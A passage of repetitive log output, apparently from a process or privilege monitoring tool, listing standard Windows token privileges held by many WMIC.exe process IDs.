Token: SeProfSingleProcessPrivilege	2108	WMIC.exe
Token: SeIncBasePriorityPrivilege	2108	WMIC.exe
Token: SeCreatePagefilePrivilege	2108	WMIC.exe
Token: SeBackupPrivilege	2108	WMIC.exe
Token: SeRestorePrivilege	2108	WMIC.exe
Token: SeShutdownPrivilege	2108	WMIC.exe
Token: SeDebugPrivilege	2108	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2108	WMIC.exe
Token: SeRemoteShutdownPrivilege	2108	WMIC.exe
Token: SeUndockPrivilege	2108	WMIC.exe
Token: SeManageVolumePrivilege	2108	WMIC.exe
Token: 33	2108	WMIC.exe
Token: 34	2108	WMIC.exe
Token: 35	2108	WMIC.exe
Token: 36	2108	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2108	WMIC.exe
Token: SeSecurityPrivilege	2108	WMIC.exe
Token: SeTakeOwnershipPrivilege	2108	WMIC.exe
Token: SeLoadDriverPrivilege	2108	WMIC.exe
Token: SeSystemProfilePrivilege	2108	WMIC.exe
Token: SeSystemtimePrivilege	2108	WMIC.exe
Token: SeProfSingleProcessPrivilege	2108	WMIC.exe
Token: SeIncBasePriorityPrivilege	2108	WMIC.exe
Token: SeCreatePagefilePrivilege	2108	WMIC.exe
Token: SeBackupPrivilege	2108	WMIC.exe
Token: SeRestorePrivilege	2108	WMIC.exe
Token: SeShutdownPrivilege	2108	WMIC.exe
Token: SeDebugPrivilege	2108	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2108	WMIC.exe
Token: SeRemoteShutdownPrivilege	2108	WMIC.exe
Token: SeUndockPrivilege	2108	WMIC.exe
Token: SeManageVolumePrivilege	2108	WMIC.exe
Token: 33	2108	WMIC.exe
Token: 34	2108	WMIC.exe
Token: 35	2108	WMIC.exe
Token: 36	2108	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3552	WMIC.exe
Token: SeSecurityPrivilege	3552	WMIC.exe
Token: SeTakeOwnershipPrivilege	3552	WMIC.exe
Token: SeLoadDriverPrivilege	3552	WMIC.exe
Token: SeSystemProfilePrivilege	3552	WMIC.exe
Token: SeSystemtimePrivilege	3552	WMIC.exe
Token: SeProfSingleProcessPrivilege	3552	WMIC.exe
Token: SeIncBasePriorityPrivilege	3552	WMIC.exe
Token: SeCreatePagefilePrivilege	3552	WMIC.exe
Token: SeBackupPrivilege	3552	WMIC.exe
Token: SeRestorePrivilege	3552	WMIC.exe
Token: SeShutdownPrivilege	3552	WMIC.exe
Token: SeDebugPrivilege	3552	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3552	WMIC.exe
Token: SeRemoteShutdownPrivilege	3552	WMIC.exe
Token: SeUndockPrivilege	3552	WMIC.exe
Token: SeManageVolumePrivilege	3552	WMIC.exe
Token: 33	3552	WMIC.exe
Token: 34	3552	WMIC.exe
Token: 35	3552	WMIC.exe
Token: 36	3552	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3552	WMIC.exe
Token: SeSecurityPrivilege	3552	WMIC.exe
Token: SeTakeOwnershipPrivilege	3552	WMIC.exe
Token: SeLoadDriverPrivilege	3552	WMIC.exe
Token: SeSystemProfilePrivilege	3552	WMIC.exe
Token: SeSystemtimePrivilege	3552	WMIC.exe
Token: SeProfSingleProcessPrivilege	3552	WMIC.exe
Token: SeIncBasePriorityPrivilege	3552	WMIC.exe
Token: SeCreatePagefilePrivilege	3552	WMIC.exe
Token: SeBackupPrivilege	3552	WMIC.exe
Token: SeRestorePrivilege	3552	WMIC.exe
Token: SeShutdownPrivilege	3552	WMIC.exe
Token: SeDebugPrivilege	3552	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3552	WMIC.exe
Token: SeRemoteShutdownPrivilege	3552	WMIC.exe
Token: SeUndockPrivilege	3552	WMIC.exe
Token: SeManageVolumePrivilege	3552	WMIC.exe
Token: 33	3552	WMIC.exe
Token: 34	3552	WMIC.exe
Token: 35	3552	WMIC.exe
Token: 36	3552	WMIC.exe
Token: SeIncreaseQuotaPrivilege	276	WMIC.exe
Token: SeSecurityPrivilege	276	WMIC.exe
Token: SeTakeOwnershipPrivilege	276	WMIC.exe
Token: SeLoadDriverPrivilege	276	WMIC.exe
Token: SeSystemProfilePrivilege	276	WMIC.exe
Token: SeSystemtimePrivilege	276	WMIC.exe
Token: SeProfSingleProcessPrivilege	276	WMIC.exe
Token: SeIncBasePriorityPrivilege	276	WMIC.exe
Token: SeCreatePagefilePrivilege	276	WMIC.exe
Token: SeBackupPrivilege	276	WMIC.exe
Token: SeRestorePrivilege	276	WMIC.exe
Token: SeShutdownPrivilege	276	WMIC.exe
Token: SeDebugPrivilege	276	WMIC.exe
Token: SeSystemEnvironmentPrivilege	276	WMIC.exe
Token: SeRemoteShutdownPrivilege	276	WMIC.exe
Token: SeUndockPrivilege	276	WMIC.exe
Token: SeManageVolumePrivilege	276	WMIC.exe
Token: 33	276	WMIC.exe
Token: 34	276	WMIC.exe
Token: 35	276	WMIC.exe
Token: 36	276	WMIC.exe
Token: SeIncreaseQuotaPrivilege	276	WMIC.exe
Token: SeSecurityPrivilege	276	WMIC.exe
Token: SeTakeOwnershipPrivilege	276	WMIC.exe
Token: SeLoadDriverPrivilege	276	WMIC.exe
Token: SeSystemProfilePrivilege	276	WMIC.exe
Token: SeSystemtimePrivilege	276	WMIC.exe
Token: SeProfSingleProcessPrivilege	276	WMIC.exe
Token: SeIncBasePriorityPrivilege	276	WMIC.exe
Token: SeCreatePagefilePrivilege	276	WMIC.exe
Token: SeBackupPrivilege	276	WMIC.exe
Token: SeRestorePrivilege	276	WMIC.exe
Token: SeShutdownPrivilege	276	WMIC.exe
Token: SeDebugPrivilege	276	WMIC.exe
Token: SeSystemEnvironmentPrivilege	276	WMIC.exe
Token: SeRemoteShutdownPrivilege	276	WMIC.exe
Token: SeUndockPrivilege	276	WMIC.exe
Token: SeManageVolumePrivilege	276	WMIC.exe
Token: 33	276	WMIC.exe
Token: 34	276	WMIC.exe
Token: 35	276	WMIC.exe
Token: 36	276	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3888	WMIC.exe
Token: SeSecurityPrivilege	3888	WMIC.exe
Token: SeTakeOwnershipPrivilege	3888	WMIC.exe
Token: SeLoadDriverPrivilege	3888	WMIC.exe
Token: SeSystemProfilePrivilege	3888	WMIC.exe
Token: SeSystemtimePrivilege	3888	WMIC.exe
Token: SeProfSingleProcessPrivilege	3888	WMIC.exe
Token: SeIncBasePriorityPrivilege	3888	WMIC.exe
Token: SeCreatePagefilePrivilege	3888	WMIC.exe
Token: SeBackupPrivilege	3888	WMIC.exe
Token: SeRestorePrivilege	3888	WMIC.exe
Token: SeShutdownPrivilege	3888	WMIC.exe
Token: SeDebugPrivilege	3888	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3888	WMIC.exe
Token: SeRemoteShutdownPrivilege	3888	WMIC.exe
Token: SeUndockPrivilege	3888	WMIC.exe
Token: SeManageVolumePrivilege	3888	WMIC.exe
Token: 33	3888	WMIC.exe
Token: 34	3888	WMIC.exe
Token: 35	3888	WMIC.exe
Token: 36	3888	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3888	WMIC.exe
Token: SeSecurityPrivilege	3888	WMIC.exe
Token: SeTakeOwnershipPrivilege	3888	WMIC.exe
Token: SeLoadDriverPrivilege	3888	WMIC.exe
Token: SeSystemProfilePrivilege	3888	WMIC.exe
Token: SeSystemtimePrivilege	3888	WMIC.exe
Token: SeProfSingleProcessPrivilege	3888	WMIC.exe
Token: SeIncBasePriorityPrivilege	3888	WMIC.exe
Token: SeCreatePagefilePrivilege	3888	WMIC.exe
Token: SeBackupPrivilege	3888	WMIC.exe
Token: SeRestorePrivilege	3888	WMIC.exe
Token: SeShutdownPrivilege	3888	WMIC.exe
Token: SeDebugPrivilege	3888	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3888	WMIC.exe
Token: SeRemoteShutdownPrivilege	3888	WMIC.exe
Token: SeUndockPrivilege	3888	WMIC.exe
Token: SeManageVolumePrivilege	3888	WMIC.exe
Token: 33	3888	WMIC.exe
Token: 34	3888	WMIC.exe
Token: 35	3888	WMIC.exe
Token: 36	3888	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3540	WMIC.exe
Token: SeSecurityPrivilege	3540	WMIC.exe
Token: SeTakeOwnershipPrivilege	3540	WMIC.exe
Token: SeLoadDriverPrivilege	3540	WMIC.exe
Token: SeSystemProfilePrivilege	3540	WMIC.exe
Token: SeSystemtimePrivilege	3540	WMIC.exe
Token: SeProfSingleProcessPrivilege	3540	WMIC.exe
Token: SeIncBasePriorityPrivilege	3540	WMIC.exe
Token: SeCreatePagefilePrivilege	3540	WMIC.exe
Token: SeBackupPrivilege	3540	WMIC.exe
Token: SeRestorePrivilege	3540	WMIC.exe
Token: SeShutdownPrivilege	3540	WMIC.exe
Token: SeDebugPrivilege	3540	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3540	WMIC.exe
Token: SeRemoteShutdownPrivilege	3540	WMIC.exe
Token: SeUndockPrivilege	3540	WMIC.exe
Token: SeManageVolumePrivilege	3540	WMIC.exe
Token: 33	3540	WMIC.exe
Token: 34	3540	WMIC.exe
Token: 35	3540	WMIC.exe
Token: 36	3540	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3540	WMIC.exe
Token: SeSecurityPrivilege	3540	WMIC.exe
Token: SeTakeOwnershipPrivilege	3540	WMIC.exe
Token: SeLoadDriverPrivilege	3540	WMIC.exe
Token: SeSystemProfilePrivilege	3540	WMIC.exe
Token: SeSystemtimePrivilege	3540	WMIC.exe
Token: SeProfSingleProcessPrivilege	3540	WMIC.exe
Token: SeIncBasePriorityPrivilege	3540	WMIC.exe
Token: SeCreatePagefilePrivilege	3540	WMIC.exe
Token: SeBackupPrivilege	3540	WMIC.exe
Token: SeRestorePrivilege	3540	WMIC.exe
Token: SeShutdownPrivilege	3540	WMIC.exe
Token: SeDebugPrivilege	3540	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3540	WMIC.exe
Token: SeRemoteShutdownPrivilege	3540	WMIC.exe
Token: SeUndockPrivilege	3540	WMIC.exe
Token: SeManageVolumePrivilege	3540	WMIC.exe
Token: 33	3540	WMIC.exe
Token: 34	3540	WMIC.exe
Token: 35	3540	WMIC.exe
Token: 36	3540	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1836	WMIC.exe
Token: SeSecurityPrivilege	1836	WMIC.exe
Token: SeTakeOwnershipPrivilege	1836	WMIC.exe
Token: SeLoadDriverPrivilege	1836	WMIC.exe
Token: SeSystemProfilePrivilege	1836	WMIC.exe
Token: SeSystemtimePrivilege	1836	WMIC.exe
Token: SeProfSingleProcessPrivilege	1836	WMIC.exe
Token: SeIncBasePriorityPrivilege	1836	WMIC.exe
Token: SeCreatePagefilePrivilege	1836	WMIC.exe
Token: SeBackupPrivilege	1836	WMIC.exe
Token: SeRestorePrivilege	1836	WMIC.exe
Token: SeShutdownPrivilege	1836	WMIC.exe
Token: SeDebugPrivilege	1836	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1836	WMIC.exe
Token: SeRemoteShutdownPrivilege	1836	WMIC.exe
Token: SeUndockPrivilege	1836	WMIC.exe
Token: SeManageVolumePrivilege	1836	WMIC.exe
Token: 33	1836	WMIC.exe
Token: 34	1836	WMIC.exe
Token: 35	1836	WMIC.exe
Token: 36	1836	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1836	WMIC.exe
Token: SeSecurityPrivilege	1836	WMIC.exe
Token: SeTakeOwnershipPrivilege	1836	WMIC.exe
Token: SeLoadDriverPrivilege	1836	WMIC.exe
Token: SeSystemProfilePrivilege	1836	WMIC.exe
Token: SeSystemtimePrivilege	1836	WMIC.exe
Token: SeProfSingleProcessPrivilege	1836	WMIC.exe
Token: SeIncBasePriorityPrivilege	1836	WMIC.exe
Token: SeCreatePagefilePrivilege	1836	WMIC.exe
Token: SeBackupPrivilege	1836	WMIC.exe
Token: SeRestorePrivilege	1836	WMIC.exe
Token: SeShutdownPrivilege	1836	WMIC.exe
Token: SeDebugPrivilege	1836	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1836	WMIC.exe
Token: SeRemoteShutdownPrivilege	1836	WMIC.exe
Token: SeUndockPrivilege	1836	WMIC.exe
Token: SeManageVolumePrivilege	1836	WMIC.exe
Token: 33	1836	WMIC.exe
Token: 34	1836	WMIC.exe
Token: 35	1836	WMIC.exe
Token: 36	1836	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2252	WMIC.exe
Token: SeSecurityPrivilege	2252	WMIC.exe
Token: SeTakeOwnershipPrivilege	2252	WMIC.exe
Token: SeLoadDriverPrivilege	2252	WMIC.exe
Token: SeSystemProfilePrivilege	2252	WMIC.exe
Token: SeSystemtimePrivilege	2252	WMIC.exe
Token: SeProfSingleProcessPrivilege	2252	WMIC.exe
Token: SeIncBasePriorityPrivilege	2252	WMIC.exe
Token: SeCreatePagefilePrivilege	2252	WMIC.exe
Token: SeBackupPrivilege	2252	WMIC.exe
Token: SeRestorePrivilege	2252	WMIC.exe
Token: SeShutdownPrivilege	2252	WMIC.exe
Token: SeDebugPrivilege	2252	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2252	WMIC.exe
Token: SeRemoteShutdownPrivilege	2252	WMIC.exe
Token: SeUndockPrivilege	2252	WMIC.exe
Token: SeManageVolumePrivilege	2252	WMIC.exe
Token: 33	2252	WMIC.exe
Token: 34	2252	WMIC.exe
Token: 35	2252	WMIC.exe
Token: 36	2252	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2252	WMIC.exe
Token: SeSecurityPrivilege	2252	WMIC.exe
Token: SeTakeOwnershipPrivilege	2252	WMIC.exe
Token: SeLoadDriverPrivilege	2252	WMIC.exe
Token: SeSystemProfilePrivilege	2252	WMIC.exe
Token: SeSystemtimePrivilege	2252	WMIC.exe
Token: SeProfSingleProcessPrivilege	2252	WMIC.exe
Token: SeIncBasePriorityPrivilege	2252	WMIC.exe
Token: SeCreatePagefilePrivilege	2252	WMIC.exe
Token: SeBackupPrivilege	2252	WMIC.exe
Token: SeRestorePrivilege	2252	WMIC.exe
Token: SeShutdownPrivilege	2252	WMIC.exe
Token: SeDebugPrivilege	2252	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2252	WMIC.exe
Token: SeRemoteShutdownPrivilege	2252	WMIC.exe
Token: SeUndockPrivilege	2252	WMIC.exe
Token: SeManageVolumePrivilege	2252	WMIC.exe
Token: 33	2252	WMIC.exe
Token: 34	2252	WMIC.exe
Token: 35	2252	WMIC.exe
Token: 36	2252	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3052	WMIC.exe
Token: SeSecurityPrivilege	3052	WMIC.exe
Token: SeTakeOwnershipPrivilege	3052	WMIC.exe
Token: SeLoadDriverPrivilege	3052	WMIC.exe
Token: SeSystemProfilePrivilege	3052	WMIC.exe
Token: SeSystemtimePrivilege	3052	WMIC.exe
Token: SeProfSingleProcessPrivilege	3052	WMIC.exe
Token: SeIncBasePriorityPrivilege	3052	WMIC.exe
Token: SeCreatePagefilePrivilege	3052	WMIC.exe
Token: SeBackupPrivilege	3052	WMIC.exe
Token: SeRestorePrivilege	3052	WMIC.exe
Token: SeShutdownPrivilege	3052	WMIC.exe
Token: SeDebugPrivilege	3052	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3052	WMIC.exe
Token: SeRemoteShutdownPrivilege	3052	WMIC.exe
Token: SeUndockPrivilege	3052	WMIC.exe
Token: SeManageVolumePrivilege	3052	WMIC.exe
Token: 33	3052	WMIC.exe
Token: 34	3052	WMIC.exe
Token: 35	3052	WMIC.exe
Token: 36	3052	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3052	WMIC.exe
Token: SeSecurityPrivilege	3052	WMIC.exe
Token: SeTakeOwnershipPrivilege	3052	WMIC.exe
Token: SeLoadDriverPrivilege	3052	WMIC.exe
Token: SeSystemProfilePrivilege	3052	WMIC.exe
Token: SeSystemtimePrivilege	3052	WMIC.exe
Token: SeProfSingleProcessPrivilege	3052	WMIC.exe
Token: SeIncBasePriorityPrivilege	3052	WMIC.exe
Token: SeCreatePagefilePrivilege	3052	WMIC.exe
Token: SeBackupPrivilege	3052	WMIC.exe
Token: SeRestorePrivilege	3052	WMIC.exe
Token: SeShutdownPrivilege	3052	WMIC.exe
Token: SeDebugPrivilege	3052	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3052	WMIC.exe
Token: SeRemoteShutdownPrivilege	3052	WMIC.exe
Token: SeUndockPrivilege	3052	WMIC.exe
Token: SeManageVolumePrivilege	3052	WMIC.exe
Token: 33	3052	WMIC.exe
Token: 34	3052	WMIC.exe
Token: 35	3052	WMIC.exe
Token: 36	3052	WMIC.exe
Token: SeIncreaseQuotaPrivilege	508	WMIC.exe
Token: SeSecurityPrivilege	508	WMIC.exe
Token: SeTakeOwnershipPrivilege	508	WMIC.exe
Token: SeLoadDriverPrivilege	508	WMIC.exe
Token: SeSystemProfilePrivilege	508	WMIC.exe
Token: SeSystemtimePrivilege	508	WMIC.exe
Token: SeProfSingleProcessPrivilege	508	WMIC.exe
Token: SeIncBasePriorityPrivilege	508	WMIC.exe
Token: SeCreatePagefilePrivilege	508	WMIC.exe
Token: SeBackupPrivilege	508	WMIC.exe
Token: SeRestorePrivilege	508	WMIC.exe
Token: SeShutdownPrivilege	508	WMIC.exe
Token: SeDebugPrivilege	508	WMIC.exe
Token: SeSystemEnvironmentPrivilege	508	WMIC.exe
Token: SeRemoteShutdownPrivilege	508	WMIC.exe
Token: SeUndockPrivilege	508	WMIC.exe
Token: SeManageVolumePrivilege	508	WMIC.exe
Token: 33	508	WMIC.exe
Token: 34	508	WMIC.exe
Token: 35	508	WMIC.exe
Token: 36	508	WMIC.exe
Token: SeIncreaseQuotaPrivilege	508	WMIC.exe
Token: SeSecurityPrivilege	508	WMIC.exe
Token: SeTakeOwnershipPrivilege	508	WMIC.exe
Token: SeLoadDriverPrivilege	508	WMIC.exe
Token: SeSystemProfilePrivilege	508	WMIC.exe
Token: SeSystemtimePrivilege	508	WMIC.exe
Token: SeProfSingleProcessPrivilege	508	WMIC.exe
Token: SeIncBasePriorityPrivilege	508	WMIC.exe
Token: SeCreatePagefilePrivilege	508	WMIC.exe
Token: SeBackupPrivilege	508	WMIC.exe
Token: SeRestorePrivilege	508	WMIC.exe
Token: SeShutdownPrivilege	508	WMIC.exe
Token: SeDebugPrivilege	508	WMIC.exe
Token: SeSystemEnvironmentPrivilege	508	WMIC.exe
Token: SeRemoteShutdownPrivilege	508	WMIC.exe
Token: SeUndockPrivilege	508	WMIC.exe
Token: SeManageVolumePrivilege	508	WMIC.exe
Token: 33	508	WMIC.exe
Token: 34	508	WMIC.exe
Token: 35	508	WMIC.exe
Token: 36	508	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3996	WMIC.exe
Token: SeSecurityPrivilege	3996	WMIC.exe
Token: SeTakeOwnershipPrivilege	3996	WMIC.exe
Token: SeLoadDriverPrivilege	3996	WMIC.exe
Token: SeSystemProfilePrivilege	3996	WMIC.exe
Token: SeSystemtimePrivilege	3996	WMIC.exe
Token: SeProfSingleProcessPrivilege	3996	WMIC.exe
Token: SeIncBasePriorityPrivilege	3996	WMIC.exe
Token: SeCreatePagefilePrivilege	3996	WMIC.exe
Token: SeBackupPrivilege	3996	WMIC.exe
Token: SeRestorePrivilege	3996	WMIC.exe
Token: SeShutdownPrivilege	3996	WMIC.exe
Token: SeDebugPrivilege	3996	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3996	WMIC.exe
Token: SeRemoteShutdownPrivilege	3996	WMIC.exe
Token: SeUndockPrivilege	3996	WMIC.exe
Token: SeManageVolumePrivilege	3996	WMIC.exe
Token: 33	3996	WMIC.exe
Token: 34	3996	WMIC.exe
Token: 35	3996	WMIC.exe
Token: 36	3996	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3996	WMIC.exe
Token: SeSecurityPrivilege	3996	WMIC.exe
Token: SeTakeOwnershipPrivilege	3996	WMIC.exe
Token: SeLoadDriverPrivilege	3996	WMIC.exe
Token: SeSystemProfilePrivilege	3996	WMIC.exe
Token: SeSystemtimePrivilege	3996	WMIC.exe
Token: SeProfSingleProcessPrivilege	3996	WMIC.exe
Token: SeIncBasePriorityPrivilege	3996	WMIC.exe
Token: SeCreatePagefilePrivilege	3996	WMIC.exe
Token: SeBackupPrivilege	3996	WMIC.exe
Token: SeRestorePrivilege	3996	WMIC.exe
Token: SeShutdownPrivilege	3996	WMIC.exe
Token: SeDebugPrivilege	3996	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3996	WMIC.exe
Token: SeRemoteShutdownPrivilege	3996	WMIC.exe
Token: SeUndockPrivilege	3996	WMIC.exe
Token: SeManageVolumePrivilege	3996	WMIC.exe
Token: 33	3996	WMIC.exe
Token: 34	3996	WMIC.exe
Token: 35	3996	WMIC.exe
Token: 36	3996	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3992	WMIC.exe
Token: SeSecurityPrivilege	3992	WMIC.exe
Token: SeTakeOwnershipPrivilege	3992	WMIC.exe
Token: SeLoadDriverPrivilege	3992	WMIC.exe
Token: SeSystemProfilePrivilege	3992	WMIC.exe
Token: SeSystemtimePrivilege	3992	WMIC.exe
Token: SeProfSingleProcessPrivilege	3992	WMIC.exe
Token: SeIncBasePriorityPrivilege	3992	WMIC.exe
Token: SeCreatePagefilePrivilege	3992	WMIC.exe
Token: SeBackupPrivilege	3992	WMIC.exe
Token: SeRestorePrivilege	3992	WMIC.exe
Token: SeShutdownPrivilege	3992	WMIC.exe
Token: SeDebugPrivilege	3992	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3992	WMIC.exe
Token: SeRemoteShutdownPrivilege	3992	WMIC.exe
Token: SeUndockPrivilege	3992	WMIC.exe
Token: SeManageVolumePrivilege	3992	WMIC.exe
Token: 33	3992	WMIC.exe
Token: 34	3992	WMIC.exe
Token: 35	3992	WMIC.exe
Token: 36	3992	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3992	WMIC.exe
Token: SeSecurityPrivilege	3992	WMIC.exe
Token: SeTakeOwnershipPrivilege	3992	WMIC.exe
Token: SeLoadDriverPrivilege	3992	WMIC.exe
Token: SeSystemProfilePrivilege	3992	WMIC.exe
Token: SeSystemtimePrivilege	3992	WMIC.exe
Token: SeProfSingleProcessPrivilege	3992	WMIC.exe
Token: SeIncBasePriorityPrivilege	3992	WMIC.exe
Token: SeCreatePagefilePrivilege	3992	WMIC.exe
Token: SeBackupPrivilege	3992	WMIC.exe
Token: SeRestorePrivilege	3992	WMIC.exe
Token: SeShutdownPrivilege	3992	WMIC.exe
Token: SeDebugPrivilege	3992	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3992	WMIC.exe
Token: SeRemoteShutdownPrivilege	3992	WMIC.exe
Token: SeUndockPrivilege	3992	WMIC.exe
Token: SeManageVolumePrivilege	3992	WMIC.exe
Token: 33	3992	WMIC.exe
Token: 34	3992	WMIC.exe
Token: 35	3992	WMIC.exe
Token: 36	3992	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2220	WMIC.exe
Token: SeSecurityPrivilege	2220	WMIC.exe
Token: SeTakeOwnershipPrivilege	2220	WMIC.exe
Token: SeLoadDriverPrivilege	2220	WMIC.exe
Token: SeSystemProfilePrivilege	2220	WMIC.exe
Token: SeSystemtimePrivilege	2220	WMIC.exe
Token: SeProfSingleProcessPrivilege	2220	WMIC.exe
Token: SeIncBasePriorityPrivilege	2220	WMIC.exe
Token: SeCreatePagefilePrivilege	2220	WMIC.exe
Token: SeBackupPrivilege	2220	WMIC.exe
Token: SeRestorePrivilege	2220	WMIC.exe
Token: SeShutdownPrivilege	2220	WMIC.exe
Token: SeDebugPrivilege	2220	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2220	WMIC.exe
Token: SeRemoteShutdownPrivilege	2220	WMIC.exe
Token: SeUndockPrivilege	2220	WMIC.exe
Token: SeManageVolumePrivilege	2220	WMIC.exe
Token: 33	2220	WMIC.exe
Token: 34	2220	WMIC.exe
Token: 35	2220	WMIC.exe
Token: 36	2220	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2220	WMIC.exe
Token: SeSecurityPrivilege	2220	WMIC.exe
Token: SeTakeOwnershipPrivilege	2220	WMIC.exe
Token: SeLoadDriverPrivilege	2220	WMIC.exe
Token: SeSystemProfilePrivilege	2220	WMIC.exe
Token: SeSystemtimePrivilege	2220	WMIC.exe
Token: SeProfSingleProcessPrivilege	2220	WMIC.exe
Token: SeIncBasePriorityPrivilege	2220	WMIC.exe
Token: SeCreatePagefilePrivilege	2220	WMIC.exe
Token: SeBackupPrivilege	2220	WMIC.exe
Token: SeRestorePrivilege	2220	WMIC.exe
Token: SeShutdownPrivilege	2220	WMIC.exe
Token: SeDebugPrivilege	2220	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2220	WMIC.exe
Token: SeRemoteShutdownPrivilege	2220	WMIC.exe
Token: SeUndockPrivilege	2220	WMIC.exe
Token: SeManageVolumePrivilege	2220	WMIC.exe
Token: 33	2220	WMIC.exe
Token: 34	2220	WMIC.exe
Token: 35	2220	WMIC.exe
Token: 36	2220	WMIC.exe
Token: SeIncreaseQuotaPrivilege	992	WMIC.exe
Token: SeSecurityPrivilege	992	WMIC.exe
Token: SeTakeOwnershipPrivilege	992	WMIC.exe
Token: SeLoadDriverPrivilege	992	WMIC.exe
Token: SeSystemProfilePrivilege	992	WMIC.exe
Token: SeSystemtimePrivilege	992	WMIC.exe
Token: SeProfSingleProcessPrivilege	992	WMIC.exe
Token: SeIncBasePriorityPrivilege	992	WMIC.exe
Token: SeCreatePagefilePrivilege	992	WMIC.exe
Token: SeBackupPrivilege	992	WMIC.exe
Token: SeRestorePrivilege	992	WMIC.exe
Token: SeShutdownPrivilege	992	WMIC.exe
Token: SeDebugPrivilege	992	WMIC.exe
Token: SeSystemEnvironmentPrivilege	992	WMIC.exe
Token: SeRemoteShutdownPrivilege	992	WMIC.exe
Token: SeUndockPrivilege	992	WMIC.exe
Token: SeManageVolumePrivilege	992	WMIC.exe
Token: 33	992	WMIC.exe
Token: 34	992	WMIC.exe
Token: 35	992	WMIC.exe
Token: 36	992	WMIC.exe
Token: SeIncreaseQuotaPrivilege	992	WMIC.exe
Token: SeSecurityPrivilege	992	WMIC.exe
Token: SeTakeOwnershipPrivilege	992	WMIC.exe
Token: SeLoadDriverPrivilege	992	WMIC.exe
Token: SeSystemProfilePrivilege	992	WMIC.exe
Token: SeSystemtimePrivilege	992	WMIC.exe
Token: SeProfSingleProcessPrivilege	992	WMIC.exe
Token: SeIncBasePriorityPrivilege	992	WMIC.exe
Token: SeCreatePagefilePrivilege	992	WMIC.exe
Token: SeBackupPrivilege	992	WMIC.exe
Token: SeRestorePrivilege	992	WMIC.exe
Token: SeShutdownPrivilege	992	WMIC.exe
Token: SeDebugPrivilege	992	WMIC.exe
Token: SeSystemEnvironmentPrivilege	992	WMIC.exe
Token: SeRemoteShutdownPrivilege	992	WMIC.exe
Token: SeUndockPrivilege	992	WMIC.exe
Token: SeManageVolumePrivilege	992	WMIC.exe
Token: 33	992	WMIC.exe
Token: 34	992	WMIC.exe
Token: 35	992	WMIC.exe
Token: 36	992	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1060	WMIC.exe
Token: SeSecurityPrivilege	1060	WMIC.exe
Token: SeTakeOwnershipPrivilege	1060	WMIC.exe
Token: SeLoadDriverPrivilege	1060	WMIC.exe
Token: SeSystemProfilePrivilege	1060	WMIC.exe
Token: SeSystemtimePrivilege	1060	WMIC.exe
Token: SeProfSingleProcessPrivilege	1060	WMIC.exe
Token: SeIncBasePriorityPrivilege	1060	WMIC.exe
Token: SeCreatePagefilePrivilege	1060	WMIC.exe
Token: SeBackupPrivilege	1060	WMIC.exe
Token: SeRestorePrivilege	1060	WMIC.exe
Token: SeShutdownPrivilege	1060	WMIC.exe
Token: SeDebugPrivilege	1060	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1060	WMIC.exe
Token: SeRemoteShutdownPrivilege	1060	WMIC.exe
Token: SeUndockPrivilege	1060	WMIC.exe
Token: SeManageVolumePrivilege	1060	WMIC.exe
Token: 33	1060	WMIC.exe
Token: 34	1060	WMIC.exe
Token: 35	1060	WMIC.exe
Token: 36	1060	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1060	WMIC.exe
Token: SeSecurityPrivilege	1060	WMIC.exe
Token: SeTakeOwnershipPrivilege	1060	WMIC.exe
Token: SeLoadDriverPrivilege	1060	WMIC.exe
Token: SeSystemProfilePrivilege	1060	WMIC.exe
Token: SeSystemtimePrivilege	1060	WMIC.exe
Token: SeProfSingleProcessPrivilege	1060	WMIC.exe
Token: SeIncBasePriorityPrivilege	1060	WMIC.exe
Token: SeCreatePagefilePrivilege	1060	WMIC.exe
Token: SeBackupPrivilege	1060	WMIC.exe
Token: SeRestorePrivilege	1060	WMIC.exe
Token: SeShutdownPrivilege	1060	WMIC.exe
Token: SeDebugPrivilege	1060	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1060	WMIC.exe
Token: SeRemoteShutdownPrivilege	1060	WMIC.exe
Token: SeUndockPrivilege	1060	WMIC.exe
Token: SeManageVolumePrivilege	1060	WMIC.exe
Token: 33	1060	WMIC.exe
Token: 34	1060	WMIC.exe
Token: 35	1060	WMIC.exe
Token: 36	1060	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1800	WMIC.exe
Token: SeSecurityPrivilege	1800	WMIC.exe
Token: SeTakeOwnershipPrivilege	1800	WMIC.exe
Token: SeLoadDriverPrivilege	1800	WMIC.exe
Token: SeSystemProfilePrivilege	1800	WMIC.exe
